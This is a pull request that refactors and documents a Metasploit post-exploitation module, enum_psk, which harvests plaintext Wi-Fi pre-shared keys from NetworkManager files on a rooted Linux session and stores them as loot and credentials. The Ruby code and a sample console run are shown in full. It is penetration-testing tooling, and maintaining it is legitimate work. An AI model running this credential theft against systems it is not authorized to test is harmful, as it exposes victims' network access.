### PR TITLE
enum_psk: Cleanup

### DIFF
--- a/documentation/modules/post/linux/gather/enum_psk.md
+++ b/documentation/modules/post/linux/gather/enum_psk.md
@@ -1,0 +1,48 @@
+## Vulnerable Application
+
+This module collects 802-11-Wireless-Security credentials such as
+Access-Point name and Pre-Shared-Key from Linux NetworkManager
+connection configuration files.
+
+
+## Verification Steps
+
+1. Start msfconsole
+1. Get a `root` session
+1. Do: `use post/linux/gather/enum_psk`
+1. Do: `set session <session ID>`
+1. Do: `run`
+1. You should receive credentails for wireless connections
+
+
+## Options
+
+### DIR
+
+The path for NetworkManager configuration files (default: `/etc/NetworkManager/system-connections/`)
+
+
+## Scenarios
+
+### Ubuntu 22.04.1 (x86_64)
+
+```
+msf6 > use post/linux/gather/enum_psk 
+msf6 post(linux/gather/enum_psk) > set session 1
+session => 1
+msf6 post(linux/gather/enum_psk) > run
+
+[*] Reading file /etc/NetworkManager/system-connections//Profile 1.nmconnection
+[*] Reading file /etc/NetworkManager/system-connections//test
+
+802-11-wireless-security
+========================
+
+ AccessPoint-Name  PSK
+ ----------------  ---
+ test              1234567890
+
+[+] Credentials stored in: /root/.msf4/loot/20221120081233_default_192.168.200.204_linux.psk.creds_045512.txt
+[*] Post module execution completed
+msf6 post(linux/gather/enum_psk) > 
+```

--- a/modules/post/linux/gather/enum_psk.rb
+++ b/modules/post/linux/gather/enum_psk.rb
@@ -7,103 +7,111 @@ class MetasploitModule < Msf::Post
   include Msf::Post::File
   include Msf::Post::Linux::Priv
   include Msf::Post::Linux::System
-
   include Msf::Auxiliary::Report
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'          => 'Linux Gather 802-11-Wireless-Security Credentials',
-      'Description'   => %q{
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Linux Gather NetworkManager 802-11-Wireless-Security Credentials',
+        'Description' => %q{
           This module collects 802-11-Wireless-Security credentials such as
-          Access-Point name and Pre-Shared-Key from your target CLIENT Linux
-          machine using /etc/NetworkManager/system-connections/ files.
-          The module gathers NetworkManager's plaintext "psk" information.
-      },
-      'License'       => MSF_LICENSE,
-      'Author'        => ['Cenk Kalpakoglu'],
-      'Platform'      => ['linux'],
-      'SessionTypes'  => ['shell', 'meterpreter']
-    ))
+          Access-Point name and Pre-Shared-Key from Linux NetworkManager
+          connection configuration files.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['Cenk Kalpakoglu'],
+        'Platform' => ['linux'],
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
 
-    register_options(
-      [
-        OptString.new('DIR', [true, 'The default path for network connections',
-                              '/etc/NetworkManager/system-connections/']
-        )
-      ])
+    register_options([
+      OptString.new('DIR', [true, 'The path for NetworkManager configuration files', '/etc/NetworkManager/system-connections/'])
+    ])
   end
 
-  def dir
+  def connections_directory
     datastore['DIR']
   end
 
-  # Extracts AccessPoint name and PSK
-  def get_psk(data, ap_name)
+  def extract_psk_from_file(path)
+    return if path.blank?
+
+    print_status("Reading file #{path}")
+    data = read_file(path)
+
+    return if data.blank?
+
     data.each_line do |l|
-      if l =~ /^psk=/
-        psk = l.split('=')[1].strip
-        return [ap_name, psk]
-      end
+      next unless l.starts_with?('psk=')
+
+      psk = l.split('=')[1].strip
+
+      return psk unless psk.blank?
     end
+
     nil
   end
 
-  def extract_all_creds
-    tbl = Rex::Text::Table.new({
-      'Header'  => '802-11-wireless-security',
-      'Columns' => ['AccessPoint-Name', 'PSK'],
-      'Indent'  => 1,
-    })
-    files = cmd_exec("/bin/ls -1 #{dir}").chomp.split("\n")
-    files.each do |f|
-      file = "#{dir}#{f}"
-      # TODO: find better (ruby) way
-      if data = read_file(file)
-        print_status("Reading file #{file}")
-        ret = get_psk(data, f)
-        if ret
-          tbl << ret
-        end
-      end
-    end
-    tbl
-  end
-
   def run
-    if is_root?
-      tbl = extract_all_creds
-      if tbl.rows.empty?
-        print_status('No PSK has been found!')
-      else
-        print_line("\n" + tbl.to_s)
-        p = store_loot(
-          'linux.psk.creds',
-          'text/csv',
-          session,
-          tbl.to_csv,
-          File.basename('wireless_credentials.txt')
-        )
+    unless is_root?
+      fail_with(Failure::NoAccess, 'You must run this module as root!')
+    end
 
-        print_good("Secrets stored in: #{p}")
+    connection_files = dir(connections_directory)
 
-        tbl.rows.each do |cred|
-          user = cred[0] # AP name
-          password = cred[1]
-          create_credential(
-            workspace_id: myworkspace_id,
-            origin_type: :session,
-            address: session.session_host,
-            session_id: session_db_id,
-            post_reference_name: self.refname,
-            username: user,
-            private_data: password,
-            private_type: :password,
-          )
-        end
-        print_status("Done")
-      end
-    else
-      print_error('You must run this module as root!')
+    if connection_files.blank?
+      print_status('No network connections found')
+      return
+    end
+
+    tbl = Rex::Text::Table.new({
+      'Header' => '802-11-wireless-security',
+      'Columns' => ['AccessPoint-Name', 'PSK'],
+      'Indent' => 1
+    })
+
+    connection_files.each do |f|
+      psk = extract_psk_from_file("#{connections_directory}/#{f}")
+      tbl << [f, psk] unless psk.blank?
+    end
+
+    if tbl.rows.empty?
+      print_status('No wireless PSKs found')
+      return
+    end
+
+    print_line("\n#{tbl}")
+
+    p = store_loot(
+      'linux.psk.creds',
+      'text/csv',
+      session,
+      tbl.to_csv,
+      'wireless_credentials.txt'
+    )
+
+    print_good("Credentials stored in: #{p}")
+
+    tbl.rows.each do |cred|
+      user = cred[0] # AP name
+      password = cred[1]
+      create_credential(
+        workspace_id: myworkspace_id,
+        origin_type: :session,
+        address: session.session_host,
+        session_id: session_db_id,
+        post_reference_name: refname,
+        username: user,
+        private_data: password,
+        private_type: :password
+      )
     end
   end
 end


### PR DESCRIPTION
Prior to this PR, the module used unintuitive method names, unnecessarily passed and returned complex objects to/from methods, passed variables to methods for no reason other than to return the variables later, and wrapped the entire `run` method in a `is_root?` and `tbl.rows.empty?` conditionals. This has been cleaned up.

Also:

* Adds documentation
* Adds `notes`
* Resolves Rubocop violations
* Replaces `/bin/ls -1 #{dir}` with `dir` method from Post library
* Removes a useless `TODO`
 
There is a lot of room for improvement in this module. Ideally the module would be expanded to also capture other NetworkManager configuration information (including credentials, such as 802.1x creds). This is out of scope for this PR.

---

I used a dumb test file to test this:

```
# cat /etc/NetworkManager/system-connections/test 
asdf
psk=1234567890
asdf=asdf
```
